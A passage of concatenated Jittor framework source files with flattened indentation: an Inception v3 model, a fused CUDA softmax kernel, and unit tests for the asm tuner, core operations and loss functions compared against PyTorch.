* inception_blocks: List of seven blocks, [conv_block, inception_a, inception_b, inception_c, inception_d, inception_e, inception_aux]. If None, will use [BasicConv2d, InceptionA, InceptionB, InceptionC, InceptionD, InceptionE, InceptionAux] instead. Default: None.
    * init_weights: Default: True.
"""
def __init__(self, num_classes=1000, aux_logits=True, inception_blocks=None, init_weights=True):
super(Inception3, self).__init__()
if (inception_blocks is None):
inception_blocks = [BasicConv2d, InceptionA, InceptionB, InceptionC, InceptionD, InceptionE, InceptionAux]
assert (len(inception_blocks) == 7)
conv_block = inception_blocks[0]
inception_a = inception_blocks[1]
inception_b = inception_blocks[2]
inception_c = inception_blocks[3]
inception_d = inception_blocks[4]
inception_e = inception_blocks[5]
inception_aux = inception_blocks[6]
self.aux_logits = aux_logits
self.Conv2d_1a_3x3 = conv_block(3, 32, kernel_size=3, stride=2)
self.Conv2d_2a_3x3 = conv_block(32, 32, kernel_size=3)
self.Conv2d_2b_3x3 = conv_block(32, 64, kernel_size=3, padding=1)
self.Conv2d_3b_1x1 = conv_block(64, 80, kernel_size=1)
self.Conv2d_4a_3x3 = conv_block(80, 192, kernel_size=3)
self.Mixed_5b = inception_a(192, pool_features=32)
self.Mixed_5c = inception_a(256, pool_features=64)
self.Mixed_5d = inception_a(288, pool_features=64)
self.Mixed_6a = inception_b(288)
self.Mixed_6b = inception_c(768, channels_7x7=128)
self.Mixed_6c = inception_c(768, channels_7x7=160)
self.Mixed_6d = inception_c(768, channels_7x7=160)
self.Mixed_6e = inception_c(768, channels_7x7=192)
if aux_logits:
self.AuxLogits = inception_aux(768, num_classes)
self.Mixed_7a = inception_d(768)
self.Mixed_7b = inception_e(1280)
self.Mixed_7c = inception_e(2048)
self.fc = nn.Linear(2048, num_classes)
def _forward(self, x):
x = self.Conv2d_1a_3x3(x)
x = self.Conv2d_2a_3x3(x)
x = self.Conv2d_2b_3x3(x)
x = nn.pool(x, 3, "maximum", stride=2)
x = self.Conv2d_3b_1x1(x)
x = self.Conv2d_4a_3x3(x)
x = nn.pool(x, 3, "maximum", stride=2)
x = self.Mixed_5b(x)
x = self.Mixed_5c(x)
x = self.Mixed_5d(x)
x = self.Mixed_6a(x)
x = self.Mixed_6b(x)
x = self.Mixed_6c(x)
x = self.Mixed_6d(x)
x = self.Mixed_6e(x)
aux_defined = self.aux_logits
if aux_defined:
aux = self.AuxLogits(x)
else:
aux = None
x = self.Mixed_7a(x)
x = self.Mixed_7b(x)
x = self.Mixed_7c(x)
x = nn.AdaptiveAvgPool2d(1)(x)
x = nn.Dropout()(x)
x = jt.reshape(x, (x.shape[0], (- 1)))
x = self.fc(x)
return (x, aux)
def eager_outputs(self, x, aux):
return x
def execute(self, x):
(x, aux) = self._forward(x)
aux_defined = self.aux_logits
return self.eager_outputs(x, aux)
class InceptionA(nn.Module):
def __init__(self, in_channels, pool_features, conv_block=None):
super(InceptionA, self).__init__()
if (conv_block is None):
conv_block = BasicConv2d
self.branch1x1 = conv_block(in_channels, 64, kernel_size=1)
self.branch5x5_1 = conv_block(in_channels, 48, kernel_size=1)
self.branch5x5_2 = conv_block(48, 64, kernel_size=5, padding=2)
self.branch3x3dbl_1 = conv_block(in_channels, 64, kernel_size=1)
self.branch3x3dbl_2 = conv_block(64, 96, kernel_size=3, padding=1)
self.branch3x3dbl_3 = conv_block(96, 96, kernel_size=3, padding=1)
self.branch_pool = conv_block(in_channels, pool_features, kernel_size=1)
def _forward(self, x):
branch1x1 = self.branch1x1(x)
branch5x5 = self.branch5x5_1(x)
branch5x5 = self.branch5x5_2(branch5x5)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)
branch_pool = nn.pool(x, 3, "mean", stride=1, padding=1)
branch_pool = self.branch_pool(branch_pool)
outputs = [branch1x1, branch5x5, branch3x3dbl, branch_pool]
return outputs
def execute(self, x):
outputs = self._forward(x)
return jt.concat(outputs, dim=1)
class InceptionB(nn.Module):
def __init__(self, in_channels, conv_block=None):
super(InceptionB, self).__init__()
if (conv_block is None):
conv_block = BasicConv2d
self.branch3x3 = conv_block(in_channels, 384, kernel_size=3, stride=2)
self.branch3x3dbl_1 = conv_block(in_channels, 64, kernel_size=1)
self.branch3x3dbl_2 = conv_block(64, 96, kernel_size=3, padding=1)
self.branch3x3dbl_3 = conv_block(96, 96, kernel_size=3, stride=2)
def _forward(self, x):
branch3x3 = self.branch3x3(x)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl = self.branch3x3dbl_3(branch3x3dbl)
branch_pool = nn.pool(x, 3, "maximum", stride=2)
outputs = [branch3x3, branch3x3dbl, branch_pool]
return outputs
def execute(self, x):
outputs = self._forward(x)
return jt.concat(outputs, dim=1)
class InceptionC(nn.Module):
def __init__(self, in_channels, channels_7x7, conv_block=None):
super(InceptionC, self).__init__()
if (conv_block is None):
conv_block = BasicConv2d
self.branch1x1 = conv_block(in_channels, 192, kernel_size=1)
c7 = channels_7x7
self.branch7x7_1 = conv_block(in_channels, c7, kernel_size=1)
self.branch7x7_2 = conv_block(c7, c7, kernel_size=(1, 7), padding=(0, 3))
self.branch7x7_3 = conv_block(c7, 192, kernel_size=(7, 1), padding=(3, 0))
self.branch7x7dbl_1 = conv_block(in_channels, c7, kernel_size=1)
self.branch7x7dbl_2 = conv_block(c7, c7, kernel_size=(7, 1), padding=(3, 0))
self.branch7x7dbl_3 = conv_block(c7, c7, kernel_size=(1, 7), padding=(0, 3))
self.branch7x7dbl_4 = conv_block(c7, c7, kernel_size=(7, 1), padding=(3, 0))
self.branch7x7dbl_5 = conv_block(c7, 192, kernel_size=(1, 7), padding=(0, 3))
self.branch_pool = conv_block(in_channels, 192, kernel_size=1)
def _forward(self, x):
branch1x1 = self.branch1x1(x)
branch7x7 = self.branch7x7_1(x)
branch7x7 = self.branch7x7_2(branch7x7)
branch7x7 = self.branch7x7_3(branch7x7)
branch7x7dbl = self.branch7x7dbl_1(x)
branch7x7dbl = self.branch7x7dbl_2(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_3(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_4(branch7x7dbl)
branch7x7dbl = self.branch7x7dbl_5(branch7x7dbl)
branch_pool = nn.pool(x, kernel_size=3, op="mean", stride=1, padding=1)
branch_pool = self.branch_pool(branch_pool)
outputs = [branch1x1, branch7x7, branch7x7dbl, branch_pool]
return outputs
def execute(self, x):
outputs = self._forward(x)
return jt.concat(outputs, dim=1)
class InceptionD(nn.Module):
def __init__(self, in_channels, conv_block=None):
super(InceptionD, self).__init__()
if (conv_block is None):
conv_block = BasicConv2d
self.branch3x3_1 = conv_block(in_channels, 192, kernel_size=1)
self.branch3x3_2 = conv_block(192, 320, kernel_size=3, stride=2)
self.branch7x7x3_1 = conv_block(in_channels, 192, kernel_size=1)
self.branch7x7x3_2 = conv_block(192, 192, kernel_size=(1, 7), padding=(0, 3))
self.branch7x7x3_3 = conv_block(192, 192, kernel_size=(7, 1), padding=(3, 0))
self.branch7x7x3_4 = conv_block(192, 192, kernel_size=3, stride=2)
def _forward(self, x):
branch3x3 = self.branch3x3_1(x)
branch3x3 = self.branch3x3_2(branch3x3)
branch7x7x3 = self.branch7x7x3_1(x)
branch7x7x3 = self.branch7x7x3_2(branch7x7x3)
branch7x7x3 = self.branch7x7x3_3(branch7x7x3)
branch7x7x3 = self.branch7x7x3_4(branch7x7x3)
branch_pool = nn.pool(x, kernel_size=3, op="maximum", stride=2)
outputs = [branch3x3, branch7x7x3, branch_pool]
return outputs
def execute(self, x):
outputs = self._forward(x)
return jt.concat(outputs, dim=1)
class InceptionE(nn.Module):
def __init__(self, in_channels, conv_block=None):
super(InceptionE, self).__init__()
if (conv_block is None):
conv_block = BasicConv2d
self.branch1x1 = conv_block(in_channels, 320, kernel_size=1)
self.branch3x3_1 = conv_block(in_channels, 384, kernel_size=1)
self.branch3x3_2a = conv_block(384, 384, kernel_size=(1, 3), padding=(0, 1))
self.branch3x3_2b = conv_block(384, 384, kernel_size=(3, 1), padding=(1, 0))
self.branch3x3dbl_1 = conv_block(in_channels, 448, kernel_size=1)
self.branch3x3dbl_2 = conv_block(448, 384, kernel_size=3, padding=1)
self.branch3x3dbl_3a = conv_block(384, 384, kernel_size=(1, 3), padding=(0, 1))
self.branch3x3dbl_3b = conv_block(384, 384, kernel_size=(3, 1), padding=(1, 0))
self.branch_pool = conv_block(in_channels, 192, kernel_size=1)
def _forward(self, x):
branch1x1 = self.branch1x1(x)
branch3x3 = self.branch3x3_1(x)
branch3x3 = [self.branch3x3_2a(branch3x3), self.branch3x3_2b(branch3x3)]
branch3x3 = jt.concat(branch3x3, dim=1)
branch3x3dbl = self.branch3x3dbl_1(x)
branch3x3dbl = self.branch3x3dbl_2(branch3x3dbl)
branch3x3dbl = [self.branch3x3dbl_3a(branch3x3dbl), self.branch3x3dbl_3b(branch3x3dbl)]
branch3x3dbl = jt.concat(branch3x3dbl, dim=1)
branch_pool = nn.pool(x, kernel_size=3, op="mean", stride=1, padding=1)
branch_pool = self.branch_pool(branch_pool)
outputs = [branch1x1, branch3x3, branch3x3dbl, branch_pool]
return outputs
def execute(self, x):
outputs = self._forward(x)
return jt.concat(outputs, dim=1)
class InceptionAux(nn.Module):
def __init__(self, in_channels, num_classes, conv_block=None):
super(InceptionAux, self).__init__()
if (conv_block is None):
conv_block = BasicConv2d
self.conv0 = conv_block(in_channels, 128, kernel_size=1)
self.conv1 = conv_block(128, 768, kernel_size=5)
self.conv1.stddev = 0.01
self.fc = nn.Linear(768, num_classes)
self.fc.stddev = 0.001
def execute(self, x):
x = nn.pool(x, kernel_size=5, op="mean", stride=3)
x = self.conv0(x)
x = self.conv1(x)
x = nn.AdaptiveAvgPool2d(1)(x)
x = jt.reshape(x, (x.shape[0], (- 1)))
x = self.fc(x)
return x
class BasicConv2d(nn.Module):
def __init__(self, in_channels, out_channels, **kwargs):
super(BasicConv2d, self).__init__()
self.conv = nn.Conv(in_channels, out_channels, bias=False, **kwargs)
self.bn = nn.BatchNorm(out_channels, eps=0.001)
def execute(self, x):
x = self.conv(x)
x = self.bn(x)
return nn.relu(x)
```
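A minimal usage sketch for the model above (weights are random unless `pretrained=True`, which loads `jittorhub://inception_v3.pkl`; 299x299 is the standard Inception v3 input resolution):
```python
import jittor as jt
from jittor.models.inception import inception_v3

model = inception_v3(pretrained=False, aux_logits=True)
model.eval()                      # inference mode (BatchNorm uses running stats)
x = jt.rand((2, 3, 299, 299))     # a batch of two 299x299 RGB images
y = model(x)                      # class logits, shape [2, num_classes]
print(y.shape)
```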
#### File: jittor/other/code_softmax.py
```python
import jittor as jt
from jittor import nn
def can_softmax_v1(a, dim):
if not jt.flags.use_cuda:
return False
if dim != -1 and dim != len(a.shape)-1:
return False
if a.shape[len(a.shape)-1] > 10000:
return False
return True
def softmax_v1(a, log=False):
assert can_softmax_v1(a, -1)
length = a.shape[-1]
# tnum = 1024
tnum = 500 if length % 500 == 0 else 512
tnum = 125 if length % 125 == 0 else 128
# tnum = 125
# tnum = 1000 if length % 1000 == 0 else 1024
# tnum = 250
per_thread = (length-1) // tnum + 1
ILP = 1
for ilp in [8,4,2]:
if length % tnum == 0 and per_thread % ilp == 0:
ILP = ilp
per_thread //= ILP
break
for_loop = f"""
#pragma unroll
for (int i=0; i<{per_thread}; i++)
"""
if length % tnum != 0:
for_loop += f"if ((i*{tnum}+threadIdx.x)*{ILP} < len)\n"
return jt.code(a.shape, a.dtype, [a], cuda_header=f'''
#include <{jt.compile_extern.cub_home}cub/cub.cuh>
#include <type/fp16_compute.h>
''', cuda_src=f'''
__global__ void kernel(in0_type* x, out0_type* y, int len) {{
typedef cub::BlockReduce<float, {tnum}> BlockReduce;
constexpr int need_log = {int(log)};
__shared__ typename BlockReduce::TempStorage temp_storage;
int id = blockIdx.x * len;
in0_type v[{per_thread}][{ILP}];
{for_loop}
vload<sizeof(in0_type)*{ILP}>(v[i], &x[id+(i*{tnum}+threadIdx.x)*{ILP}]);
// v[i] = x[id+i*{tnum}+threadIdx.x];
float v1 = -1e30;
{for_loop}
#pragma unroll
for (int j=0; j<{ILP}; j++) {{
v1 = max(v1, float(v[i][j]));
}}
__shared__ float vmax;
auto tmp = BlockReduce(temp_storage).Reduce(v1, cub::Max());
if (threadIdx.x == 0)
vmax = tmp;
__syncthreads();
v1 = 0;
{for_loop}
#pragma unroll
for (int j=0; j<{ILP}; j++) {{
if (need_log) {{
v[i][j] = float(v[i][j]) - vmax;
v1 += expf(float(v[i][j]));
}} else {{
v[i][j] = expf(float(v[i][j]) - vmax);
v1 += float(v[i][j]);
}}
}}
tmp = BlockReduce(temp_storage).Sum(v1);
__shared__ float vsum;
if (threadIdx.x == 0)
vsum = tmp;
__syncthreads();
{for_loop}
#pragma unroll
for (int j=0; j<{ILP}; j++) {{
if (need_log)
v[i][j] = v[i][j] - @expand_op(log,@in0_type,vsum);
else
v[i][j] = float(v[i][j])/vsum;
}}
{for_loop}
vload<sizeof(in0_type)*{ILP}>(&y[id+(i*{tnum}+threadIdx.x)*{ILP}], v[i]);
}}
int len = in0->shape[in0->shape.size()-1];
int bnum = in0->numel() / len;
cudaGetLastError();
kernel<<<bnum, {tnum}>>>(in0_p, out0_p, len);
CHECK(0 == cudaGetLastError());
''', cuda_grad_src=[f"""
__global__ void kernel(pout0_type* x, dout_type* y, out0_type* z, int len) {{
int id = blockIdx.x * len;
in0_type vx[{per_thread}][{ILP}];
in0_type vy[{per_thread}][{ILP}];
{for_loop} {{
vload<sizeof(in0_type)*{ILP}>(vx[i], &x[id+(i*{tnum}+threadIdx.x)*{ILP}]);
vload<sizeof(in0_type)*{ILP}>(vy[i], &y[id+(i*{tnum}+threadIdx.x)*{ILP}]);
}}
float v1 = 0;
{for_loop}
#pragma unroll
for (int j=0; j<{ILP}; j++)
v1 += {"float(vy[i][j]);" if log else "float(vx[i][j]*vy[i][j]);"}
typedef cub::BlockReduce<float, {tnum}> BlockReduce;
__shared__ typename BlockReduce::TempStorage temp_storage;
auto tmp = BlockReduce(temp_storage).Sum(v1);
__shared__ float reduce_var;
if (threadIdx.x == 0)
reduce_var = tmp;
__syncthreads();
{for_loop}
#pragma unroll
for (int j=0; j<{ILP}; j++)
vx[i][j] = {
"vy[i][j] - in0_type(expf(vx[i][j]) * reduce_var);" if log
else "vx[i][j] * (vy[i][j] - in0_type(reduce_var));"
}
{for_loop}
vload<sizeof(in0_type)*{ILP}>(&z[id+(i*{tnum}+threadIdx.x)*{ILP}],
vx[i]);
}}
int len = in0->shape[in0->shape.size()-1];
int bnum = in0->numel() / len;
cudaGetLastError();
kernel<<<bnum, {tnum}>>>(pout0_p, dout_p, out0_p, len);
CHECK(0 == cudaGetLastError());
"""])
```
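A minimal sketch of how these helpers are meant to be used, assuming a CUDA build of jittor and the module path above (`jittor.other.code_softmax`); `softmax_v1` is only valid when `can_softmax_v1` accepts the input:
```python
import jittor as jt
from jittor.other.code_softmax import can_softmax_v1, softmax_v1

jt.flags.use_cuda = 1               # the fused kernel is CUDA-only
x = jt.rand((32, 1000))             # softmax over the last dimension
if can_softmax_v1(x, -1):
    y = softmax_v1(x)               # probabilities
    log_y = softmax_v1(x, log=True) # log-probabilities
    print(y.sum(-1))                # each row sums to ~1
```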
#### File: jittor/test/test_asm_tuner.py
```python
import unittest
import jittor as jt
from jittor import LOG
import os
import re
import platform
class TestAsmTuner(unittest.TestCase):
@classmethod
def setUpClass(self):
inline = "inline"
if jt.flags.cc_type == "clang":
inline = "__attribute__((always_inline))"
self.cc_content='''
#include <cmath>
#include <algorithm>
#include "var.h"
#include "ops/broadcast_to_op.h"
#include "ops/binary_op.h"
#include "fused_op.h"
#define op0_Tx float32
#define op0_DIM 2
#define op0_BCAST 1
#define op0_index_t int32_t
#define op1_Tx float
#define op1_DIM 2
#define op1_BCAST 0
#define op1_index_t int32_t
#define op2_Tx float
#define op2_Ty float32
#define op2_Tz float32
#define op2_OP subtract
#define op2_index_t int32_t
using namespace jittor;
#define INLINE_FUNC '''+inline+''' void
INLINE_FUNC func0(op0_Tx* __restrict__ op0_xp, op1_Tx* __restrict__ op1_xp, op2_Tz* __restrict__ op2_zp) {
//@begin replace "vmova(.*,.*\(.*\))" "vmovnt\g<1>"
(void)(__builtin_assume_aligned(op0_xp, alignment));
(void)(__builtin_assume_aligned(op1_xp, alignment));
(void)(__builtin_assume_aligned(op2_zp, alignment));
op2_index_t range0 = 1048576;
op2_index_t range1 = 32;
op0_index_t op0_xstride1 = 1;
auto op0_xstride0 = op0_xstride1 * range1;
op1_index_t op1_xstride1 = 1;
auto op1_xstride0 = op1_xstride1 * range1;
op2_index_t op2_zstride1 = 1;
auto op2_zstride0 = op2_zstride1 * range1;
for (op2_index_t id0 = 0; id0<range0; id0++) {
for (op2_index_t id1 = 0; id1<range1; id1++) {
auto op0_xid = + 0 * op0_xstride0 + id1 * op0_xstride1;
auto op0_zd = op0_xp[op0_xid];
auto op1_xid = + id0 * op1_xstride0 + id1 * op1_xstride1;
auto op1_zd = op1_xp[op1_xid];
op2_index_t op2_i = + id0 * op2_zstride0 + id1 * op2_zstride1;
op2_zp[op2_i] = ((op1_zd )-(op0_zd ));
}
}
//@end
}
void jittor::FusedOp::jit_run() {
auto op0_x = ((BroadcastToOp*)(ops[0]))->x;
auto op1_x = ((BroadcastToOp*)(ops[1]))->x;
auto op2_z = ((BinaryOp*)(ops[2]))->z;
auto* __restrict__ op0_xp = op0_x->ptr<op0_Tx>();
auto* __restrict__ op1_xp = op1_x->ptr<op1_Tx>();
auto* __restrict__ op2_zp = op2_z->ptr<op2_Tz>();
func0(op0_xp,op1_xp,op2_zp);
}
'''
self.src_path=os.path.join(jt.flags.cache_path, 'jit', 'asm_test_op.cc')
self.asm_path = os.path.join(jt.flags.jittor_path, "utils/asm_tuner.py")
self.so_path=self.src_path.replace(".cc",".so")
def run_cmd(self, cmd):
return jt.compiler.run_cmd(cmd)
def check_cc(self, content, check_movnt):
LOG.vv("check_cc")
with open(self.src_path,"w") as f:
f.write(content)
cmd = jt.flags.python_path + " " + \
jt.flags.jittor_path+"/utils/asm_tuner.py --cc_path=" + jt.flags.cc_path + " '" + self.src_path + "'" + " -DJIT -DJIT_cpu " + jt.compiler.fix_cl_flags(jt.flags.cc_flags) + " -o '" + self.so_path + "'";
self.run_cmd(cmd)
s_path=self.so_path.replace(".so",".s")
bo=False
with open(s_path) as f:
for line in f:
if line.find("vmovnt")!=-1:
bo=True
break
if check_movnt and jt.flags.cc_type == "clang":
assert bo
@unittest.skipIf(platform.system() == 'Darwin', 'will crash on macOS')
def test_asm_tuner(self):
self.check_cc(self.cc_content,True)
self.check_cc(self.cc_content.replace("@begin","233").replace("@end","666"), False)
if __name__ == "__main__":
unittest.main()
```
#### File: jittor/test/test_core.py
```python
import unittest
import jittor as jt
import numpy as np
import os
def expect_error(func):
try:
func()
except Exception as e:
return
    raise Exception("Expected an error, but nothing was caught.")
class TestCore(unittest.TestCase):
def test_number_of_hold_vars(self):
assert jt.random([1,2,3]).peek() == "float32[1,2,3,]"
assert jt.core.number_of_hold_vars() == 0
x = jt.random([1,2,3])
assert jt.core.number_of_hold_vars() == 1
del x
assert jt.core.number_of_hold_vars() == 0
def test_fetch_sync(self):
dtypes = ["float32", "float64"]
for dtype in dtypes:
x = jt.random([1,2,3], dtype)
res = x.data
assert res.dtype == dtype and res.shape == (1,2,3)
def test_set_seed(self):
a = jt.random([1,2,3]).data
b = jt.random([1,2,3]).data
assert str(a) != str(b)
jt.set_seed(1)
a = jt.random([1,2,3]).data
jt.set_seed(1)
b = jt.random([1,2,3]).data
assert str(a) == str(b)
def test_array_op(self):
data = [
np.array([1,2,3]),
np.int32([1,2,3]),
np.int64([1,2,3]),
np.float32([1,2,3]),
np.float64([1,2,3]),
]
for a in data:
assert sum(jt.array(a).data) == 6
assert np.all(jt.array(np.int32([1,2,3])[::-1]).data == [3,2,1])
assert jt.array(1).data.shape == (1,)
def test_matmul_op(self):
a = np.array([[1, 0], [0, 1]]).astype("float32")
b = np.array([[4, 1], [2, 2]]).astype("float32")
c = np.matmul(a, b)
jtc = jt.matmul(jt.array(a), jt.array(b)).data
assert np.allclose(jtc, c)
a = np.random.random((128,3,10,20))
b = np.random.random((20,30))
c = np.matmul(a, b)
jtc = jt.matmul(jt.array(a), jt.array(b)).data
assert np.allclose(jtc, c)
a = np.random.random((128,3,10,20))
b = np.random.random((128,3,20,30))
c = np.matmul(a, b)
jtc = jt.matmul(jt.array(a), jt.array(b)).data
assert np.allclose(jtc, c), np.abs(jtc-c).max()
def test_var_holder(self):
jt.clean()
self.assertEqual(jt.number_of_lived_vars(), 0)
expect_error(lambda: jt.matmul(1,1))
expect_error(lambda: jt.matmul([1],[1]))
expect_error(lambda: jt.matmul([[1]],[1]))
self.assertEqual(jt.number_of_lived_vars(), 0)
a = jt.matmul(jt.float32([[3]]), jt.float32([[4]])).data
assert a.shape == (1,1) and a[0,0] == 12
a = np.array([[1, 0], [0, 1]]).astype("float32")
b = np.array([[4, 1], [2, 2]]).astype("float32")
c = np.matmul(a, b)
jtc = jt.matmul(jt.array(a), jt.array(b)).data
assert np.all(jtc == c)
def test_save_load_sub_module(self):
class Net(jt.Module):
def __init__(self):
self.conv1 = jt.nn.Conv(3,3,3)
net = Net()
assert list(net.state_dict().keys()) == ['conv1.weight', 'conv1.bias']
assert list(net.conv1.state_dict().keys()) == ['weight', 'bias']
pkl_name = os.path.join(jt.flags.cache_path, "sub.pkl")
net.conv1.save(pkl_name)
net.conv1.load(pkl_name)
def test_module(self):
a = jt.Module()
a.__setattr__("x", 1)
assert a.__getattr__("x") == 1
a.y = 2
assert a.y == 2
def test_modules(self):
a = jt.Module()
a.x = jt.Module()
a.y = jt.Module()
a.a = jt.array([1,2,3])
a.b = jt.array([1,2,3])
assert list(a._modules.keys()) == ["x", "y"]
assert a._modules['x'] is a.x
assert a._modules['y'] is a.y
assert list(a._parameters.keys()) == ['a', 'b']
assert a._parameters['a'] is a.a
assert a._parameters['b'] is a.b
def test_copy_memopt(self):
# exe: post run
# remove pending done
# add hold pending done
# pending release mem done
a = jt.rand(10)
b = a.copy().copy().copy()
a.name("aa")
b.name("bb")
cnt = 0
graphs = jt.dump_all_graphs()
for x in graphs.nodes_info:
if "Var" not in x: continue
print(x)
if ",aa," in x:
assert ":2:i" in x, x
elif ",bb," in x:
assert ":1:i" in x
else:
assert ":1:i" in x
b.sync()
cnt = 0
graphs = jt.dump_all_graphs()
for x in graphs.nodes_info:
# print(x)
if "Var" in x and ",0)" in x:
cnt += 1
assert cnt == 2
def test_fuse_memopt(self):
def check():
a = jt.rand(10)
b = (a.copy().name("copy_out1") + 1).sqr() + a.copy().name("copy_out2")
b.sync()
for n in jt.dump_all_graphs().nodes_info:
if "Var" not in n: continue
# print(n)
if "copy_out1" in n:
# copy out1 is not free
assert ",0)" not in n
if "copy_out2" in n:
# copy out2 is freeed
assert ",0)" in n
da = jt.grad(b, a)
da.sync()
check()
jt.gc()
assert jt.liveness_info()['lived_vars'] == 0
def test_out_hint1(self):
a = jt.rand(10)
b = jt.rand(10)
c = jt.ternary_out_hint((a<b).out_hint(), a, b).clone()
c.sync()
da, db = jt.grad(c, [a, b])
jt.sync_all()
for n in jt.dump_all_graphs().nodes_info:
if "Var" in n and "bool" in n:
print(n)
assert ",0)" not in n
jt.ternary_out_hint((a<b).out_hint(), a, 0).sync()
def test_out_hint2(self):
a = jt.rand(10)
b = jt.rand(10)
c = jt.ternary(a<b, a, b).clone()
# c.sync()
da, db = jt.grad(c, [a, b])
jt.sync_all()
for n in jt.dump_all_graphs().nodes_info:
if "Var" in n and "bool" in n:
print(n)
assert ",0)" not in n
def test_relu_memopt(self):
x = a = jt.rand(10,10)
for i in range(10):
# a = jt.nn.relu(a)
a = jt.ternary_out_hint((a>0.0).name("b"+str(i)), a, 0.0)
a = jt.matmul(a.name("m1"),jt.rand(10,10).name("m2")).name("m3-"+str(i))
da = jt.grad(a, x, True)
# jt.clean_graph()
da.sync()
cnt1 = 0
cnt2 = 0
for n in jt.dump_all_graphs().nodes_info:
if "Var" in n and ",0)" not in n:
cnt1 +=1
if "bool" in n:
cnt2 += 1
print(cnt1, cnt2)
assert cnt2 == 10
assert cnt1 <= 33, cnt1
def test_node_order(self):
a = jt.nn.Sequential()
for i in range(10):
a.append(jt.nn.Linear(10,10, bias=False))
sgd = jt.optim.SGD(a.parameters(), 0.1)
jt.sync_all()
with jt.log_capture_scope(log_silent=1,
log_vprefix="exe=100") as logs:
x = jt.rand(3,10)
y = a(x)
sgd.step(y*y)
jt.sync_all()
orders = []
for l in logs:
msg = l["msg"]
if "Finished" in msg:
# print(msg)
if "weight" in msg:
assert msg.count("Var") >= 2
order = int(msg.split('fused ')[1].split("/")[0])
# print(order)
orders.append(order)
assert len(orders) == 10, orders
for i in range(10):
assert orders[i] <= 14+i*3
def test_bc_bug(self):
a = jt.zeros((1,1))
b = a * 0.5
b.sync()
da = jt.grad(b, a)
da.sync()
if __name__ == "__main__":
unittest.main()
```
#### File: jittor/test/test_loss.py
```python
import unittest
import jittor as jt
import os
import numpy as np
import jittor.nn as jnn
skip_this_test = False
try:
jt.dirty_fix_pytorch_runtime_error()
import torch
import torch.nn as tnn
except:
skip_this_test = True
@unittest.skipIf(skip_this_test, "No Torch found")
class TestLoss(unittest.TestCase):
def test_l1_loss(self):
jt_loss=jnn.L1Loss()
tc_loss=tnn.L1Loss()
output=np.random.randn(10,100).astype(np.float32)
target=np.random.randn(10,100).astype(np.float32)
jt_y=jt_loss(jt.array(output), jt.array(target))
tc_y=tc_loss(torch.from_numpy(output), torch.from_numpy(target))
assert np.allclose(jt_y.numpy(), tc_y.numpy())
def test_mse_loss(self):
jt_loss=jnn.MSELoss()
tc_loss=tnn.MSELoss()
output=np.random.randn(10,100).astype(np.float32)
target=np.random.randn(10,100).astype(np.float32)
jt_y=jt_loss(jt.array(output), jt.array(target))
tc_y=tc_loss(torch.from_numpy(output), torch.from_numpy(target))
assert np.allclose(jt_y.numpy(), tc_y.numpy())
def test_nll_loss(self):
tc_loss = tnn.functional.nll_loss
jt_loss = jnn.nll_loss
output=np.random.randn(10,10).astype(np.float32)
target=np.random.randint(10, size=(10))
jt_y=jt_loss(jt.array(output), jt.array(target),reduction='mean')
tc_y=tc_loss(torch.from_numpy(output), torch.from_numpy(target),reduction='mean')
assert np.allclose(jt_y.numpy(), tc_y.numpy())
output=np.random.randn(10,10).astype(np.float32)
target=np.random.randint(10, size=(10))
weight=np.random.randn(10,).astype(np.float32)
jt_y=jt_loss(jt.array(output), jt.array(target),jt.array(weight),reduction='mean')
tc_y=tc_loss(torch.from_numpy(output), torch.from_numpy(target),torch.from_numpy(weight),reduction='mean')
assert np.allclose(jt_y.numpy(), tc_y.numpy())
def test_cross_entropy_loss(self):
jt_loss=jnn.CrossEntropyLoss()
tc_loss=tnn.CrossEntropyLoss()
output=np.random.randn(10,10).astype(np.float32)
target=np.random.randint(10, size=(10))
jt_y=jt_loss(jt.array(output), jt.array(target))
tc_y=tc_loss(torch.from_numpy(output), torch.from_numpy(target))
assert np.allclose(jt_y.numpy(), tc_y.numpy())
def test_cross_entropy_loss_v2(self):
B = 100
C = 5
for shape in [[100,1],[],[100,20]]:
s1 = [B,C]+shape
s2 = [B]+shape
a = np.random.randn(*s1).astype(np.float32)
b = np.random.randint(0,C,size=s2).astype(np.int32)
weight = np.random.randn(C).astype(np.float32)
for r in ['mean','sum','none']:
r1 = torch.nn.functional.cross_entropy(torch.tensor(a),torch.tensor(b.astype(np.int64)),weight=torch.tensor(weight),reduction=r)
r2 = jnn.cross_entropy_loss(jt.array(a),jt.array(b),weight=jt.array(weight),reduction=r)
np.testing.assert_allclose(r1.numpy(),r2.numpy(),rtol=1e-3, atol=1e-3)
for r in ['mean','sum','none']:
r1 = torch.nn.functional.cross_entropy(torch.tensor(a),torch.tensor(b.astype(np.int64)),reduction=r)
r2 = jnn.cross_entropy_loss(jt.array(a),jt.array(b),reduction=r)
np.testing.assert_allclose(r1.numpy(),r2.numpy(),rtol=1e-3, atol=1e-3)
r1 = torch.nn.functional.cross_entropy(torch.tensor(a),torch.tensor(b.astype(np.int64)))
r2 = jnn.cross_entropy_loss(jt.array(a),jt.array(b))
np.testing.assert_allclose(r1.numpy(),r2.numpy(),rtol=1e-3, atol=1e-3)
r1 = torch.nn.functional.cross_entropy(torch.tensor(a),torch.tensor(b.astype(np.int64)),weight=torch.tensor(weight))
r2 = jnn.cross_entropy_loss(jt.array(a),jt.array(b),weight=jt.array(weight))
np.testing.assert_allclose(r1.numpy(),r2.numpy(),rtol=1e-3, atol=1e-3)
for r in ['mean','sum','none']:
r1 = torch.nn.functional.cross_entropy(torch.tensor(a),torch.tensor(b.astype(np.int64)),weight=torch.tensor(weight),reduction=r,ignore_index=C//2)
r2 = jnn.cross_entropy_loss(jt.array(a),jt.array(b),weight=jt.array(weight),reduction=r,ignore_index=C//2)
np.testing.assert_allclose(r1.numpy(),r2.numpy(),rtol=1e-3, atol=1e-3)
for r in ['mean','sum','none']:
r1 = torch.nn.functional.cross_entropy(torch.tensor(a),torch.tensor(b.astype(np.int64)),reduction=r,ignore_index=C//2)
r2 = jnn.cross_entropy_loss(jt.array(a),jt.array(b),reduction=r,ignore_index=C//2)
np.testing.assert_allclose(r1.numpy(),r2.numpy(),rtol=1e-3, atol=1e-3)
r1 = torch.nn.functional.cross_entropy(torch.tensor(a),torch.tensor(b.astype(np.int64)),ignore_index=C//2)
